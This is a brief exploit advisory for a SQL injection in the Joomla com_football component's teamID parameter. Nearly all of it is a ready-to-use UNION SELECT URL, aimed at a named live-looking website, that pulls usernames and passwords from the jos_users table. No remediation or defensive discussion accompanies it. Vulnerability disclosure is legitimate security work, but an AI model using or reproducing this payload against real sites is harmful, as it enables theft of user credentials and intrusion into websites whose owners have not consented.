Joomla Component com_football (teamID) SQL Injection Vulnerability

Example:

http://www.cvhspreps.com/index.php?option=com_football&task=viewteam&teamID=-1+union+select+null,null,3,4,5,6,concat(username,char(58),password)KHG,8+from+jos_users--<http://www.cvhspreps.com/index.php?option=com_football&task=viewteam&teamID=-1+union+select+null,null,3,4,5,6,concat%28username,char%2858%29,password%29KHG,8+from+jos_users-->